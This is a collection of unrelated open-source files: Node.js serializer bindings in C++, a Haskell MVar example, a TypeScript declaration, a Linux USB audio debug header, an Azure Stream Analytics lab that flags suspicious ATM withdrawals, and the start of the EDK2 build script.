  if (!ok) return ctx->env()->ThrowError("ReadUint32() failed");
  return args.GetReturnValue().Set(value);
}

// Returns the 64-bit value as a [hi, lo] pair of uint32s, mirroring the
// (hi, lo) convention used by the serializer side.
void DeserializerContext::ReadUint64(const FunctionCallbackInfo<Value>& args) {
  DeserializerContext* ctx;
  ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());

  uint64_t value;
  bool ok = ctx->deserializer_.ReadUint64(&value);
  if (!ok) return ctx->env()->ThrowError("ReadUint64() failed");

  uint32_t hi = static_cast<uint32_t>(value >> 32);
  uint32_t lo = static_cast<uint32_t>(value);

  Isolate* isolate = ctx->env()->isolate();

  Local<Value> ret[] = {
    Integer::NewFromUnsigned(isolate, hi),
    Integer::NewFromUnsigned(isolate, lo)
  };
  return args.GetReturnValue().Set(Array::New(isolate, ret, arraysize(ret)));
}

void DeserializerContext::ReadDouble(const FunctionCallbackInfo<Value>& args) {
  DeserializerContext* ctx;
  ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());

  double value;
  bool ok = ctx->deserializer_.ReadDouble(&value);
  if (!ok) return ctx->env()->ThrowError("ReadDouble() failed");
  return args.GetReturnValue().Set(value);
}

// Consumes `length` raw bytes and returns the byte *offset* of that region
// inside the original input buffer (no copy is made); JS can slice the
// Buffer it passed to the constructor at that offset.
void DeserializerContext::ReadRawBytes(
    const FunctionCallbackInfo<Value>& args) {
  DeserializerContext* ctx;
  ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());

  Maybe<int64_t> length_arg = args[0]->IntegerValue(ctx->env()->context());
  if (length_arg.IsNothing()) return;
  size_t length = length_arg.FromJust();

  const void* data;
  bool ok = ctx->deserializer_.ReadRawBytes(length, &data);
  if (!ok) return ctx->env()->ThrowError("ReadRawBytes() failed");

  const uint8_t* position = reinterpret_cast<const uint8_t*>(data);
  CHECK_GE(position, ctx->data_);
  CHECK_LE(position + length, ctx->data_ + ctx->length_);

  const uint32_t offset = position - ctx->data_;
  CHECK_EQ(ctx->data_ + offset, position);

  args.GetReturnValue().Set(offset);
}
// Binding initializer: registers the `Serializer` and `Deserializer`
// constructors (and their prototype methods) on the binding object.
void Initialize(Local<Object> target,
                Local<Value> unused,
                Local<Context> context,
                void* priv) {
  Environment* env = Environment::GetCurrent(context);

  Local<FunctionTemplate> ser =
      env->NewFunctionTemplate(SerializerContext::New);

  ser->InstanceTemplate()->SetInternalFieldCount(
      SerializerContext::kInternalFieldCount);
  ser->Inherit(BaseObject::GetConstructorTemplate(env));

  env->SetProtoMethod(ser, "writeHeader", SerializerContext::WriteHeader);
  env->SetProtoMethod(ser, "writeValue", SerializerContext::WriteValue);
  env->SetProtoMethod(ser, "releaseBuffer", SerializerContext::ReleaseBuffer);
  env->SetProtoMethod(ser,
                      "transferArrayBuffer",
                      SerializerContext::TransferArrayBuffer);
  env->SetProtoMethod(ser, "writeUint32", SerializerContext::WriteUint32);
  env->SetProtoMethod(ser, "writeUint64", SerializerContext::WriteUint64);
  env->SetProtoMethod(ser, "writeDouble", SerializerContext::WriteDouble);
  env->SetProtoMethod(ser, "writeRawBytes", SerializerContext::WriteRawBytes);
  env->SetProtoMethod(ser,
                      "_setTreatArrayBufferViewsAsHostObjects",
                      SerializerContext::SetTreatArrayBufferViewsAsHostObjects);

  Local<String> serializerString =
      FIXED_ONE_BYTE_STRING(env->isolate(), "Serializer");
  ser->SetClassName(serializerString);
  target->Set(env->context(),
              serializerString,
              ser->GetFunction(env->context()).ToLocalChecked()).Check();

  Local<FunctionTemplate> des =
      env->NewFunctionTemplate(DeserializerContext::New);

  des->InstanceTemplate()->SetInternalFieldCount(
      DeserializerContext::kInternalFieldCount);
  des->Inherit(BaseObject::GetConstructorTemplate(env));

  env->SetProtoMethod(des, "readHeader", DeserializerContext::ReadHeader);
  env->SetProtoMethod(des, "readValue", DeserializerContext::ReadValue);
  env->SetProtoMethod(des,
                      "getWireFormatVersion",
                      DeserializerContext::GetWireFormatVersion);
  env->SetProtoMethod(des,
                      "transferArrayBuffer",
                      DeserializerContext::TransferArrayBuffer);
  env->SetProtoMethod(des, "readUint32", DeserializerContext::ReadUint32);
  env->SetProtoMethod(des, "readUint64", DeserializerContext::ReadUint64);
  env->SetProtoMethod(des, "readDouble", DeserializerContext::ReadDouble);
  env->SetProtoMethod(des, "_readRawBytes", DeserializerContext::ReadRawBytes);

  Local<String> deserializerString =
      FIXED_ONE_BYTE_STRING(env->isolate(), "Deserializer");
  des->SetClassName(deserializerString);
  target->Set(env->context(),
              deserializerString,
              des->GetFunction(env->context()).ToLocalChecked()).Check();
}
} // anonymous namespace
} // namespace node
NODE_MODULE_CONTEXT_AWARE_INTERNAL(serdes, node::Initialize)
| {
"pile_set_name": "Github"
} |
-- file: ch24/MVarExample.hs
import Control.Concurrent
-- | One-shot communication between two threads through an MVar:
-- the forked child blocks on 'takeMVar' until the main thread
-- fills the cell with 'putMVar'.
communicate = do
  m <- newEmptyMVar          -- shared cell, initially empty
  forkIO $ do
    -- child thread: blocks here until the MVar is filled below
    v <- takeMVar m
    putStrLn ("received " ++ show v)
  putStrLn "sending"
  putMVar m "wake up!"       -- fills the cell, waking the child
"pile_set_name": "Github"
} |
/**
 * Convert the keys of an object to camelCase.
 *
 * @param obj - Source object whose keys are converted. (Presumably the
 *   original object is left untouched and a new object is returned —
 *   confirm against the implementation; it is not visible here.)
 * @param ignored - Optional list of keys to leave unchanged.
 * @returns The key-converted object, typed by the caller-supplied `S`.
 */
declare function toCamelCase<T extends {}, S extends {}>(obj: T, ignored?: string[]): S;
export = toCamelCase;
"pile_set_name": "Github"
} |
#ifndef __USBAUDIO_DEBUG_H
#define __USBAUDIO_DEBUG_H

/*
 * h/w constraints
 */

#ifdef HW_CONST_DEBUG
/* Debug builds: emit hardware-constraint traces at KERN_DEBUG level. */
#define hwc_debug(fmt, args...) printk(KERN_DEBUG fmt, ##args)
#else
/* Normal builds: compile the tracing calls away entirely. */
#define hwc_debug(fmt, args...) do { } while(0)
#endif

#endif /* __USBAUDIO_DEBUG_H */
| {
"pile_set_name": "Github"
} |
<a name="HOLTitle"></a>
# Analyzing Data in Real Time with Azure Stream Analytics #
[Azure Stream Analytics](https://azure.microsoft.com/services/stream-analytics/) is a cloud-based service for ingesting high-velocity data streaming from devices, sensors, applications, Web sites, and other data sources and analyzing that data in real time. It supports a [SQL-like query language](https://msdn.microsoft.com/library/azure/dn834998.aspx) that works over dynamic data streams and makes analyzing constantly changing data no more difficult than performing queries on static data stored in traditional databases. With Azure Stream Analytics, you can set up jobs that analyze incoming data for anomalies or information of interest and record the results, present notifications on dashboards, or even fire off alerts to mobile devices. And all of it can be done at low cost and with a minimum of effort.
Scenarios for the application of real-time data analytics are legion and include fraud detection, identity-theft protection, optimizing the allocation of resources (think of an Uber-like transportation service that sends drivers to areas of increasing demand *before* that demand peaks), click-stream analysis on Web sites, shopping suggestions on retail-sales sites, and countless others. Having the ability to process data *as it comes in* rather than waiting until after it has been aggregated offers a competitive advantage to businesses that are agile enough to make adjustments on the fly.
In this lab, you'll create an Azure Stream Analytics job and use it to analyze data streaming in from simulated Internet of Things (IoT) devices. And you will see how simple it is to monitor real-time data streams for information of significance to your research or business.
<a name="Objectives"></a>
### Objectives ###
In this hands-on lab, you will learn how to:
- Create an Azure event hub and use it as a Stream Analytics input
- Create a Stream Analytics job and test queries on sample data streams
- Run a Stream Analytics job and perform queries on live data streams
- Store Stream Analytics output in Azure storage blobs
<a name="Prerequisites"></a>
### Prerequisites ###
The following is required to complete this hands-on lab:
- An active Microsoft Azure subscription. If you don't have one, [sign up for a free trial](http://aka.ms/WATK-FreeTrial).
- [Node.js](https://nodejs.org)
<a name="Resources"></a>
### Resources ###
[Click here](https://a4r.blob.core.windows.net/public/stream-analytics-resources.zip) to download a zip file containing the resources used in this lab. Copy the contents of the zip file into a folder on your hard disk.
<a name="Cost"></a>
### Cost ###

The cost of this lab is **low**. For an overview of cost ratings, refer to [Explanation of Costs](../../Costs.md).
<a name="Exercises"></a>
## Exercises ##
This hands-on lab includes the following exercises:
- [Exercise 1: Create an event hub](#Exercise1)
- [Exercise 2: Create a shared-access signature token](#Exercise2)
- [Exercise 3: Send events to the event hub](#Exercise3)
- [Exercise 4: Create a Stream Analytics job](#Exercise4)
- [Exercise 5: Prepare queries and test with sample data](#Exercise5)
- [Exercise 6: Analyze a live data stream](#Exercise6)
Estimated time to complete this lab: **60** minutes.
<a name="Exercise1"></a>
## Exercise 1: Create an event hub ##
Azure Stream Analytics supports several types of input, including input from Azure blobs and input from Azure event hubs. Of the two, the latter is typically more interesting because in the IoT world, data is easily transmitted to Azure event hubs through field gateways (for devices that are not IP-capable) or cloud gateways (for devices that *are* IP-capable), and a single Azure event hub can handle millions of events per second transmitted from devices spread throughout the world.
In this exercise, you'll create an Azure event hub to provide input to Azure Stream Analytics and configure it so that it can be accessed safely and securely by IoT devices and gateways.
1. In your browser, navigate to the [Azure Portal](https://portal.azure.com). If you are asked to sign in, do so using your Microsoft account.
1. In the portal, click **+ Create a resource**, followed by **Internet of Things** and **Event Hubs**.

_Adding a new event hub_
1. Type a namespace name into the **Name** box. The name must be unique within Azure, so you will probably have to use something other than the name in the screen shot below. (A green check mark will appear in the box when the name you've entered is one that Azure will accept.) Select **Create new** under **Resource group** and enter the resource-group name "StreamAnalyticsResourceGroup" (without quotation marks). Choose the region closest to you in the **Location** drop-down, and then click the **Create** button.

_Creating a namespace_
1. Click **Resource groups** in the ribbon on the left, and then click the "StreamAnalyticsResourceGroup" resource group created in the previous step.

_Opening the resource group_
1. Wait until "Deploying" changes to "Succeeded." (You can click the **Refresh** button at the top of the blade to refresh the deployment status.) Then click the namespace whose name you specified in Step 3.

_Opening the namespace_
1. Click **+ Event Hub** to add an event hub to the namespace.

_Adding an event hub_
1. Type "inputhub" (without quotation marks) into the **Name** box. Then click the **Create** button.

_Creating an event hub_
1. Wait a moment for the event hub to be created. Then scroll to the bottom of the blade and click the event hub name.

_Opening the event hub_
1. In order to transmit events to the event hub from an application or device, you need to create a shared-access policy that includes Send permission. To begin, click **Shared access policies**, and then click **+ Add**.

_Adding a shared-access policy_
1. Type "SendPolicy" (without quotation marks) into the **Policy name** box and check the **Send** box. Then click the **Create** button to create the new policy.

_Creating a send policy_
1. Wait a moment for **SendPolicy** to appear in the policies list, and then click it.

_Opening the policy_
1. Click the **Copy** button to the right of the **Primary key** box to copy the policy's shared-access key to the clipboard. Then temporarily save the key by pasting it into your favorite text editor. You'll need it in the next exercise.

_Copying the primary key to the clipboard_
You have created an event hub that can ingest events and be used as the source of input to a Stream Analytics job. You have also created a policy that allows holders of that policy to send events to the event hub. The next step is to generate a security token that can be used to authenticate calls to the event hub.
<a name="Exercise2"></a>
## Exercise 2: Create a shared-access signature token ##
Applications, devices, or gateways can send events to event hubs using the [Azure Event Hubs REST API](https://msdn.microsoft.com/en-us/library/azure/Dn790674.aspx). Each request transmitted via this API must include a valid [shared-access signature (SAS)](https://azure.microsoft.com/en-us/documentation/articles/service-bus-shared-access-signature-authentication/) token in the HTTP Authorization header. SAS tokens are generated from the event hub's URL and the primary key for the policy used to communicate with the event hub — in this case, the policy named "SendPolicy" that you created in the previous exercise.
In this exercise, you will generate a shared-access signature token for the event hub created in [Exercise 1](#Exercise1) and copy it, along with the event hub URL, into a Node.js application that will be used to send events to the event hub in Exercise 3. The Azure Portal doesn't provide an interface for generating SAS tokens, so you will generate a token using a Node.js app named sas.js provided with this lab.
1. If Node.js isn't installed on your computer, go to https://nodejs.org and install it now.
> You can find out whether Node.js is installed on your computer by executing a **node -v** command in a Command Prompt window or terminal window. If Node.js is installed, you will see the Node.js version number.
1. Open a Command Prompt window or terminal window and in it, navigate to the directory where you copied the [resources that accompany this lab](https://a4r.blob.core.windows.net/public/stream-analytics-resources.zip). Then execute the following commands to install the packages used by the Node.js apps in that directory:
```
npm install shared-access-signature
npm install request
```
> It is very important that you run these commands in the directory that you copied the lab resources to so the packages will be installed in the same directory as the Node apps that use them.
1. Now execute the following command to run sas.js:
```
node sas.js
```
1. When prompted for the event-hub URL, enter the text below, replacing *namespace* with the namespace name you entered in Exercise 1, Step 3. Then press Enter.
<pre>
https://<i>namespace</i>.servicebus.windows.net/inputhub</pre>
> This assumes that you named the event hub "inputhub" as directed in Exercise 1, Step 7. If you chose another name, substitute that name for "inputhub" in the event-hub URL.
1. When prompted, enter the name of the policy (SendPolicy) you created for the Azure event hub in Exercise 1, Step 10. Then press Enter.
1. When prompted, enter the policy key that you saved in Exercise 1, Step 12. Then press Enter.
1. The SAS token, which is highlighted with the red box below, will be output to the Command Prompt or terminal window. Select it and copy it to the clipboard.

_Copying the SAS token_
1. Find the file named **eventgen.js** in the directory containing the lab resources and open it in your favorite text editor. Then find the section at the top of the file labeled "KEY VARS:"
```JavaScript
///////////////// KEY VARS /////////////////
var sas = "Token";
var uri = "URL";
///////////////////////////////////////////
```
1. Replace *Token* with the SAS token you copied to the clipboard in Step 7. **Important:** The SAS token must **not include line breaks**. It needs to appear on this line as one contiguous string, and it must begin and end with quotation marks. In addition, the line must end with a semicolon.
1. Replace *URL* with the event-hub URL you entered in Step 4.
1. Save the modified eventgen.js file. The modified "KEY VARS" section should look something like this:
```JavaScript
///////////////// KEY VARS /////////////////
var sas = "SharedAccessSignature sr=https%3A%2F%2Fstream-analytics-lab.servicebus.windows.net%2Finputhub&sig=Rz5dVs73XQkUU8KUcrLivDU4Q7%2Bg8zogdApBZHak480%3D&se=1515170996.004&skn=SendPolicy";
var uri = "https://stream-analytics-lab.servicebus.windows.net/inputhub";
///////////////////////////////////////////
```
Now that you've modified eventgen.js with information specific to your event hub, it's time to generate some events.
<a name="Exercise3"></a>
## Exercise 3: Send events to the event hub ##
In this exercise, you will send events to the event hub you created in [Exercise 1](#Exercise1). To do that, you'll use Node.js to run eventgen.js, which in turn transmits secure requests to the event hub using the [Azure Event Hubs REST API](https://msdn.microsoft.com/en-us/library/azure/Dn790674.aspx). eventgen.js generates events representing withdrawals from simulated ATM machines. Each event contains relevant information such as the card number used for the withdrawal, the time and amount of the withdrawal, and a unique identifier for the ATM machine used.
1. At the command prompt or in a terminal window, navigate to the directory containing the lab resources. Then execute the following command:
```
node eventgen.js
```
You should see output similar to the following. Each line represents one event sent to the event hub, and events will probably roll by at a rate of about 2 to 3 per second. (Rates will vary depending on your connection speed.) **Confirm that each request returns the HTTP status code 201**. This indicates that the event hub received and accepted the request. If you receive any other status code — for example, 401 — then the SAS token probably isn't valid and you need to repeat [Exercise 2](#Exercise2).
```
[1000] Event sent (status code: 201)
[1001] Event sent (status code: 201)
[1002] Event sent (status code: 201)
[1003] Event sent (status code: 201)
[1004] Event sent (status code: 201)
[1005] Event sent (status code: 201)
[1006] Event sent (status code: 201)
[1007] Event sent (status code: 201)
[1008] Event sent (status code: 201)
[1009] Event sent (status code: 201)
```
1. After 10 to 20 events have been sent, press Ctrl+C (or whatever key combination your operating system supports for terminating an application running in a terminal window) to stop the flow of events. **Leave the Command Prompt or terminal window open so you can return to it later.**
Now that events are flowing to your event hub, the next step is to create a Stream Analytics job and connect it to the event hub.
<a name="Exercise4"></a>
## Exercise 4: Create a Stream Analytics job ##
In this exercise, you will use the Azure Portal to create a Stream Analytics job and connect it to the event hub you created in [Exercise 1](#Exercise1). You will also capture the raw data being passed to the Stream Analytics job from the event hub and examine its structure.
1. Return to the [Azure Portal](https://portal.azure.com) and click **+ Create a resource**, followed by **Internet of Things** and **Stream Analytics job**.

_Creating a Stream Analytics job_
1. Type "ATMAnalytics" (without quotation marks) into the **Job name** box. Select **Use Existing** under **Resource group** and select the "StreamAnalyticsResourceGroup" resource group that you created in [Exercise 1](#Exercise1). Select the region nearest you for **Location**. (It is important to select the same region that you selected for the event hub in Exercise 1, because you're not charged for data that moves within a data center, but you typically *are* charged for data that moves *between* data centers. In addition, locating services that talk to each other in the same data center reduces latency.) Then click the **Create** button.

_Specifying parameters for the Stream Analytics job_
1. Click **Resource groups** in the ribbon on the left, and then click the "StreamAnalyticsResourceGroup" resource group.

_Opening the resource group_
1. Click **ATMAnalytics** to open the Stream Analytics job in the portal.

_Opening the Stream Analytics job_
1. Click **Inputs** to add an input to the Stream Analytics job.

_Adding an input_
1. Click **+ Add**.

_Adding an input_
1. Type "Withdrawals" (without quotation marks) into the **Input alias** box. Make sure **Source Type** is set to **Data stream** and **Source** is set to **Event hub**. Select the service-bus namespace and event hub ("inputhub") you created in [Exercise 1](#Exercise1). Then select **RootManageSharedAccessKey** from the **Event hub policy name** drop-down and click the **Create** button at the bottom of the blade.

_Creating an input_
1. After a few moments, the new input — "Withdrawals" — appears in the list of inputs for the Stream Analytics job. Click it to open a blade for it.

_Opening the input_
1. Go back to the Command Prompt or terminal window you left open at the end of the previous exercise and run eventgen.js again by executing the following command:
```
node eventgen.js
```
1. With eventgen.js still running, return to the Azure Portal open in your browser and click **Sample Data**.

_Sampling input data_
1. Click **OK** to begin sampling data from the input stream.

_Specifying sampling parameters_
1. Wait a few seconds for sampling to complete, and when you are notified that the sample data can be downloaded, click to download it.

_Data sampling completed_
1. Click **Download** to download the data sampled from the input stream.

_Downloading sample data_
1. Save the JSON file that is downloaded to a location where you can easily find it. Then open the downloaded file in your favorite text editor and take a moment to examine its contents. How many rows (events) are represented in the sample data? What is the structure of each row — that is, what fields does each row contain?
> If you find the output hard to digest since there are no line breaks, try pasting it into an online JSON viewer such as the one at https://jsonformatter.curiousconcept.com/.
1. Return to the Command Prompt or terminal window in which eventgen.js is running and press Ctrl+C (or the equivalent) to stop it.
You have connected a Stream Analytics job to an event hub and demonstrated that data is passed from one to the other. You have also sampled the data input to the Stream Analytics job and examined its structure. The next step is to do something with it — specifically, to bring the power of Azure Stream Analytics to bear on the data.
<a name="Exercise5"></a>
## Exercise 5: Prepare queries and test with sample data ##
Now that your job is set up, there's much more you can do with Stream Analytics than simply view the raw data presented to it. The whole point of Stream Analytics is being able to query real-time data streams. In this exercise, you will use the [Stream Analytics Query Language](https://msdn.microsoft.com/en-us/library/azure/Dn834998.aspx) to query a sample data set for potentially fraudulent ATM transactions. It is always a good idea to test your queries against sample data before deploying them against live data streams, because with sample data, you can verify that a known set of inputs produces the expected outputs.
To flag potentially fraudulent withdrawals from ATMs, you will query for transactions performed with the same ATM card at different ATM machines within a specified time window (60 seconds). In real life, you would probably use a larger time window and perhaps even factor in the distance between ATM machines. However, a narrower time window is useful in a lab environment because it allows you to perform meaningful experiments in minutes rather than hours.
1. Begin by returning to the Stream Analytics job in the portal and clicking **Query**.

_Opening the query viewer_
1. Click the **ellipsis** (the three dots) to the right of **Withdrawals** and select **Upload sample data from file** from the menu.

_Uploading sample data for testing queries_
1. Click the **folder** icon on the right and select the file named **Withdrawals.json** from the lab resources. Then click **OK** to upload the file.
> The reason you're using a file provided for you (rather than the one you captured in the previous exercise) is to make sure everyone gets the same results. eventgen.js uses JavaScript's Math.random() function to randomize results, and Math.random() does not produce repeatable sequences of pseudo-random numbers.

_Uploading Withdrawals.json_
1. When the upload is complete, enter the following query, and then click the **Test** button to execute it against the sample data you uploaded:
```sql
SELECT * FROM Withdrawals
```
> Where did the name "Withdrawals" come from? That's the alias you assigned to the event-hub input in the previous exercise. If you named it differently, you'll need to replace "Withdrawals" with the alias you used.

_Testing a query_
1. Confirm that you see the output pictured below. The test data contains 607 rows. Each row has fields named TRANSACTIONID, TRANSACTIONTIME, DEVICEID, CARDNUMBER, and AMOUNT. DEVICEID is the ID of the ATM machine at which the transaction took place. AMOUNT is the amount of cash withdrawn from the ATM.

_Query results_
1. Suppose you only wanted to view transactions for amounts between 200 and 300, inclusive. Furthermore, suppose you wanted to clean up the output by assigning your own column names and excluding the TRANSACTIONID column. Enter the following query and click **Test** again to execute it.
```sql
SELECT TransactionTime as [Time of Transaction],
DeviceID as [ATM],
CardNumber as [Card Number],
Amount as [Amount]
FROM Withdrawals
WHERE Amount >= 200 and Amount <= 300
```
1. Confirm that the query generated the following output:

_Customizing the output_
1. One of the key features of the Stream Analytics Query Language is its ability to group results using windows of time whose length you specify. To demonstrate, enter the following query to count the number of transactions taking place each minute and click **Test** to execute it:
```sql
SELECT System.Timestamp as [Time Ending],
COUNT(*) AS [Number of Transactions]
FROM Withdrawals TIMESTAMP BY TransactionTime
GROUP BY TumblingWindow(n, 1)
```
    > TIMESTAMP BY is an important element of the Stream Analytics Query Language. If it were omitted from the query above, you would be querying for the number of transactions that arrived *at the event hub* each minute rather than the number of transactions that occurred in each 1-minute interval. TIMESTAMP BY allows you to specify a field in the input stream as the event time.
1. Confirm that you see the output below:

_Querying for the number of transactions per minute_
1. Now it's time to query the test data for potentially fraudulent transactions — transactions involving the same ATM card but different ATM machines that take place within 60 seconds of each other. *This is the query you will use in the next exercise against a live data stream*.
Enter the following query and click **Test** to execute it:
```sql
SELECT W1.CardNumber as [Card Number],
W1.DeviceID as [ATM 1], W2.DeviceID as [ATM 2],
W1.TransactionTime as [Time 1], W2.TransactionTime as [Time 2]
FROM Withdrawals W1 TIMESTAMP BY TransactionTime
JOIN Withdrawals W2 TIMESTAMP BY TransactionTime
ON W1.CardNumber = W2.CardNumber
AND DATEDIFF(ss, W1, W2) BETWEEN 0 and 60
WHERE W1.DeviceID != W2.DeviceID
```
1. This time the output should contain just three rows, each representing two transactions performed with one ATM card at two different locations within 60 seconds of each other:

_Detecting potentially fraudulent transactions_
1. Click the **Save** button at the top of the blade to save the query. Then click **Yes** when asked to confirm.

_Saving the query_
With the query now formulated, tested against a set of sample data, and saved, it's time to deploy it against a live data stream to produce a running record of potentially fraudulent transactions.
<a name="Exercise6"></a>
## Exercise 6: Analyze a live data stream ##
Being able to run your queries and see the results in the portal is great for testing, but when Azure Stream Analytics is deployed against a live data stream, you need to specify a destination (or destinations) for the output. Stream Analytics supports a variety of output types, including blobs, Azure SQL databases, and even event hubs. One motivation for using blob storage is to create a persistent record from the output.
In this exercise, you will create a storage account and configure the Stream Analytics job to store output in blob storage. Then you will run the job against a live data stream and check the results by inspecting blob storage.
1. Return to the Azure Portal and click **+ Create a resource** in the ribbon on the left. Then click **Storage**, followed by **Storage account**.

_Adding a storage account_
1. In the ensuing blade, enter a unique name for the new storage account and make sure a green check mark appears next to it. Select **Use existing** under **Resource group** and select the resource group named "StreamAnalyticsResourceGroup" so the storage account will belong to the same resource group as the Stream Analytics job and the event hub. Select the same **Location** you selected in previous exercises. Then click the **Create** button at the bottom of the blade.
> Storage account names must be 3 to 24 characters in length and can only contain numbers and lowercase letters. In addition, the name you enter must be unique within Azure.

_Creating a storage account_
1. Click **Resource groups** in the ribbon on the left, and then click the "StreamAnalyticsResourceGroup" resource group.

_Opening the resource group_
1. Click **ATMAnalytics** to open the Stream Analytics job in the portal.

_Opening the Stream Analytics job_
1. Click **Outputs**.

_Adding an output_
1. Click **+ Add**.

_Adding an output_
1. Type "FlaggedWithdrawals" (without quotation marks) into the **Output alias** box. Set **Sink** to **Blob storage** and **Subscription** to **Use blob storage from current subscription**. Under **Storage account**, select the storage account you created earlier in this exercise. Set **Container** to **Create a new container** and type "output" (without quotation marks) into the second **Container** box. Type "{date}" (without quotation marks) into the **Path pattern** box, and set **Date format** to **DD-MM-YYYY**. Then click **Create**.
> Each time you run a Stream Analytics job configured with a blob output, a new blob with a unique name is created. The purpose of **Path pattern** is to allow you to organize output blobs by date and time. In this example, the "output" container will contain folders whose names are the dates of the runs, and each folder will contain blobs with the output from those runs.

_Creating an output_
1. Close the "Outputs" blade and return to the blade for the Stream Analytics job. Then click **Start**.

_Starting the Stream Analytics job_
1. Make sure **Job output start time** is set to **Now**, and then click the **Start** button to start running the job.

_Specifying the job start time_
1. Return to the Command Prompt or terminal window in which you ran eventgen.js and execute the following command to run it again:
```
node eventgen.js
```
1. Wait 5 minutes or more to give the job time to start and eventgen.js time to transmit several hundred events. Then terminate eventgen.js and return to the browser window.
> If you'd like, you can open several terminal windows and run eventgen.js in each one to increase the volume of events.
1. Return to the Stream Analytics job in the portal and click **Stop** to stop it. Then click **Yes** when asked to confirm that you want to stop the job.

_Stopping the Stream Analytics job_
1. Wait until the job is stopped. Then open the blade for the "StreamAnalyticsResourceGroup" resource group and click the storage account you created in Step 2.

_Opening the storage account_
1. Click **Blobs**.

_Opening blob storage_
1. Click the container named "output."

_Opening the output container_
1. Click the folder in the "output" container.

_Opening the output folder_
1. Click the blob containing the Stream Analytics output.
> If there is no output blob, wait a few minutes and check again. Sometimes a blob created by a Stream Analytics job appears immediately, and at other times, it may take a few minutes to show up.

_Opening the output blob_
1. Click **Download** to download the blob.

_Downloading the output blob_
1. Open the downloaded JSON file in your favorite text editor. Each object (row) in the output represents a potentially fraudulent transaction. Note that **the number of rows and the content of each row will vary from machine to machine as well as from one run to another**.

_JSON job output_
Currently, the output from your Stream Analytics job is stored in blobs. In real life, you might prefer to view the output in a more convenient form, such as in a chart that's updated in real time. You could accomplish that by writing an application that monitors the blob and charts the data, or, better yet, by directing the output to an event hub and writing an application that subscribes to events from the event hub.
Microsoft recognizes that not everyone wants to write applications, and has provided an alternative in the form of [Microsoft Power BI](https://powerbi.microsoft.com/). With Power BI, you can create dashboards that render output from Stream Analytics jobs without writing any code. For more information, refer to [Stream Analytics & Power BI: A real-time analytics dashboard for streaming data](https://azure.microsoft.com/en-us/documentation/articles/stream-analytics-power-bi-dashboard/).
<a name="Summary"></a>
## Summary ##
Azure Stream Analytics is a powerful tool for analyzing live data streams from IoT devices or anything else that's capable of transmitting data. In this lab, you got a first-hand look at Stream Analytics as well as Azure event hubs. Among other things, you learned how to:
- Create an Azure event hub and use it as a Stream Analytics input
- Create a shared-access signature that allows event hubs to be called securely using REST APIs
- Create a Stream Analytics job and test queries on sample data streams
- Run a Stream Analytics job and perform queries on live data streams
- Create a rule (query) that detects anomalies in streaming data
- Use that rule to record anomalies in Azure blobs
One drawback to hard-coding rules into Stream Analytics is that rules don't "learn" from the data streams, which can lead to false positives in anomaly detection. If this concerns you, read the article entitled [Anomaly Detection – Using Machine Learning to Detect Abnormalities in Time Series Data](http://blogs.technet.com/b/machinelearning/archive/2014/11/05/anomaly-detection-using-machine-learning-to-detect-abnormalities-in-time-series-data.aspx) in the Azure team's Machine Learning blog. In it, they present an anomaly detection service accessible through a REST API that uses Azure Machine Learning to learn from the data presented to it. Imagine combining the power of Stream Analytics to extract information from real-time data streams with the power of Azure Machine Learning to learn from that information and refine the analytics on the fly. This is precisely the type of solution that Microsoft Azure empowers you to build!
---
Copyright 2017 Microsoft Corporation. All rights reserved. Except where otherwise noted, these materials are licensed under the terms of the MIT License. You may use them according to the license as is most appropriate for your project. The terms of this license can be found at https://opensource.org/licenses/MIT.
| {
"pile_set_name": "Github"
} |
## @file
# build a platform or a module
#
# Copyright (c) 2014, Hewlett-Packard Development Company, L.P.<BR>
# Copyright (c) 2007 - 2015, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
import Common.LongFilePathOs as os
import re
import StringIO
import sys
import glob
import time
import platform
import traceback
import encodings.ascii
from struct import *
from threading import *
from optparse import OptionParser
from subprocess import *
from Common import Misc as Utils
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.LongFilePathSupport import LongFilePath
from Common.TargetTxtClassObject import *
from Common.ToolDefClassObject import *
from Common.DataType import *
from Common.BuildVersion import gBUILD_VERSION
from AutoGen.AutoGen import *
from Common.BuildToolError import *
from Workspace.WorkspaceDatabase import *
from BuildReport import BuildReport
from GenPatchPcdTable.GenPatchPcdTable import *
from PatchPcdValue.PatchPcdValue import *
import Common.EdkLogger
import Common.GlobalData as GlobalData
# Version and Copyright
VersionNumber = "0.60" + ' ' + gBUILD_VERSION
__version__ = "%prog Version " + VersionNumber
__copyright__ = "Copyright (c) 2007 - 2014, Intel Corporation All rights reserved."

## standard targets of build command
gSupportedTarget = ['all', 'genc', 'genmake', 'modules', 'libraries', 'fds', 'clean', 'cleanall', 'cleanlib', 'run']

## build configuration file (read from the Conf directory)
gBuildConfiguration = "target.txt"
# tool-chain definition file (read from the Conf directory)
gToolsDefinition = "tools_def.txt"

# Matches names of temporary workspace-database tables, e.g. "_1_2_ab3f":
# underscore, two decimal fields, then a hex suffix.
TemporaryTablePattern = re.compile(r'^_\d+_\d+_[a-fA-F0-9]+$')
# Cache of temporary tables keyed by table name — presumably populated
# elsewhere in this module; TODO(review) confirm usage at call sites.
TmpTableDict = {}
## Check environment PATH variable to make sure the specified tool is found
#
# If the tool is found in the PATH, then True is returned
# Otherwise, False is returned
#
# @param tool Base name of the executable to look for (no extension)
#
# @retval True  the tool (with any PATHEXT extension) exists in a PATH dir
# @retval False the tool was not found
#
def IsToolInPath(tool):
    # On Windows, PATHEXT lists executable extensions (.exe, .cmd, ...) that
    # must be tried in addition to the bare name. NOTE: dict.has_key() is a
    # Python-2-only method; the 'in' operator is equivalent and works on
    # both Python 2 and Python 3.
    if 'PATHEXT' in os.environ:
        extns = os.environ['PATHEXT'].split(os.path.pathsep)
    else:
        # Non-Windows: only the bare tool name is meaningful.
        extns = ('',)
    for pathDir in os.environ['PATH'].split(os.path.pathsep):
        for ext in extns:
            if os.path.exists(os.path.join(pathDir, tool + ext)):
                return True
    return False
## Check environment variables
#
# Check environment variables that must be set for build. Currently they are
#
#   WORKSPACE       The directory all packages/platforms start from
#   EDK_TOOLS_PATH  The directory containing all tools needed by the build
